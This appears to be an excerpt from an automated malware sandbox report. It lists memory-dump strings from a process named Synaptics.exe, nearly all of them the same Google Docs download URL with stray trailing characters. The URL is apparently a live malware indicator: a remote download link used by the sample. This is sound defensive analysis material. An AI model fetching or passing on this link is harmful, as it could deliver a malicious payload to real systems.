                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.00000000081C6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQ
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQC
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQD
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQO
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQa
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadQf
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadR
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadRR
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadResolV
                                Source: Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadS2
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSG
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSf
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSm
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadSy
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadT0
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadThe
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadU
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUI
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUe
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUj
                                Source: Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadUo
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4194221853.000000001DE3B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadV3
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVH
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVQ
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadVg
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadW9n
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWk
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadWw
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D93E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadX.
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXJ
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadXi
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.0000000005660000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.00000000081C6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadY
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYN
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYd
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadYi
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZM
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_jM
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download_v
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.00000000081C6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4194221853.000000001DE3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada-for
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaJ
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadac.
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadache-
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadad
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadaddinv
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadah.
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadai
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadau
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloada~.
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.000000000088B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadb
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbI
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbh
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadbt
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcelle
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcelle?
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcherN
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadckgroH
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcn.com
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadcom
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadd
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddA
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddK
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddj
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaddvQ
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.0000000005660000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.00000000081C6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloade.co
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeD
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeO
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadeb
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaded
